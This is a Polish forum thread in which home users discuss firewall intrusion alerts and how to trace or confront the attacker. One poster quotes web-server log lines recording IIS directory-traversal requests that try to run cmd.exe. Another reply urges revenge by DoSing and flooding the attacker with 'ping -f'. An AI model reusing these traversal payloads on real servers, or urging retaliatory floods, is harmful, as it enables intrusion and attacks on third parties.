Problemy z crackerami.

[Czensi]

Co jakis czas moj firewall sygnalizuje mi proby wlamania na mojego kompa (wiem ze wlamanie to ogolne pojecie ale po co wglebiac sie w szczegoly). Mam IP, i logi, i z trudem powstrzymuje sie od bycia lamerem i zadzwonienia na abuse... W kazdym razie czy jest jakis sposob na skontaktowanie sie z gostkiem gdy znam jego IP, oczywiscie jak znam ip to moge poznac i hosta, i wyciag z ripe, ale w jaki sposob mam go znalezc ?
Pytacie sie czemu jestem taki cierpliwy ?

po prostu samnie chcial bym zeby ktos mnie zglosil to i ja tego nie robie, w kazdym razie kiedys trzeba bedzie blednemu crackerowi dac w shdupe.

 

[sminic]

Co jakis czas moj firewall sygnalizuje mi proby wlamania na mojego kompa (wiem ze wlamanie to ogolne pojecie ale po co wglebiac sie w szczegoly). Mam IP, i logi, i z trudem powstrzymuje sie od bycia lamerem i zadzwonienia na abuse... W kazdym razie czy jest jakis sposob na skontaktowanie sie z gostkiem gdy znam jego IP, oczywiscie jak znam ip to moge poznac i hosta, i wyciag z ripe, ale w jaki sposob mam go znalezc ?
Pytacie sie czemu jestem taki cierpliwy ?

po prostu samnie chcial bym zeby ktos mnie zglosil to i ja tego nie robie, w kazdym razie kiedys trzeba bedzie blednemu crackerowi dac w shdupe.

[/b]

nie wiem czy to cos ci da, bo tpsa ogolnie ignoruje takie sprawy... nie da sie skontaktowac z gostkiem... no moze sie da ;], stawiasz netubsa

koles cie skanuje patrzy a tu 12345 i patrzy a tu plik "HACKERZE CZYTAJ MNIE" a w nim zostaw mi swoj numer telefonu, i tu ip tego pana

i tresc "Syneczku mozesz juz sie rozlaczyc, bo wlasnie wyslalem logi" i koles przestanie cie nekac

. Jak chcesz mu dac w dupe, to go dosuj, flooduj i wogole co ci tylko przyjdzie do glowy

, ping -f r0x ;]

 

[Czensi]

Tjah

Dzieki. Wszystko by bylo miodnie gdyby nie to ze nie mam lanu

 

[Zeddicus]

Czensi, sugeruje zebys wrzucil tu twoje logi, z tego napewno bardziej ci pomozemy

Jesli boisz sie ze poznamy twoje ip to po prostu je stamtad wykasuj

I jeszcze jedno pytanie, czy w twoich logach znalazles moze taka fraze:

kawalek pliku /var/log/apache/access_log

...
217.99.13.193 - - [01/Oct/1996:15:31:50 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.99.13.193 - - [01/Oct/1996:15:31:50 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.99.13.193 - - [01/Oct/1996:15:31:50 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.99.13.193 - - [01/Oct/1996:15:31:51 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.99.13.193 - - [01/Oct/1996:15:31:51 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.99.48.145 - - [01/Oct/1996:15:44:53 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
217.99.48.145 - - [01/Oct/1996:15:44:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
217.99.48.145 - - [01/Oct/1996:15:44:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.99.48.145 - - [01/Oct/1996:15:44:54 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.99.48.145 - - [01/Oct/1996:15:44:55 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.99.48.145 - - [01/Oct/1996:15:44:55 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
217.99.48.145 - - [01/Oct/1996:15:44:55 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
...

jesli tak to napisz

 

[Czensi]

hmm

Nie, raczej nie znalazlem,tych logow bylo pelno. Sproboje jakies wyszperac ....o, wlasnie dupek zaatakowal, nie to raczej inny, no ale i tak jest alert, prosze:

NetBIOS Name: 210.57.128.18 (UDP Port 1025)

i drugi

HTTP 62.46.170.77 (TCP Port 3329) [TCO Flags: S]

 

[Zeddicus]

To mi wyglada na zwykle polaczenie http, po za tym z takiego kawalka tekstu niewiele da sie wyciagnac, wyslij wiecej, nawet cale logi, wtedy mozna troszke dokladniej okreslic, bo mozesz rozwarzac wtedy wszystkie mozliwosci

 

[Czensi]

Prosze

Description Packet sent from 213.76.10.1
Direction Incoming
Type Firewall
Source DNS pc1.katowice.cvx.ppp.tpnet.pl
Rating High
Protocol UDP
Action Taken Blocked
Destination IP i DNS wymazalem
Count 1
Date/Time 2002/10/09 13:39:10+2:00 GMT
Program

Prosze was o szybkie dzialanie,
dzisiaj musialem formatowac dysk
bo nie moglem sie polaczyc z netem
nawet. To znaczy moglem, ale wszystko
bylo zapchane.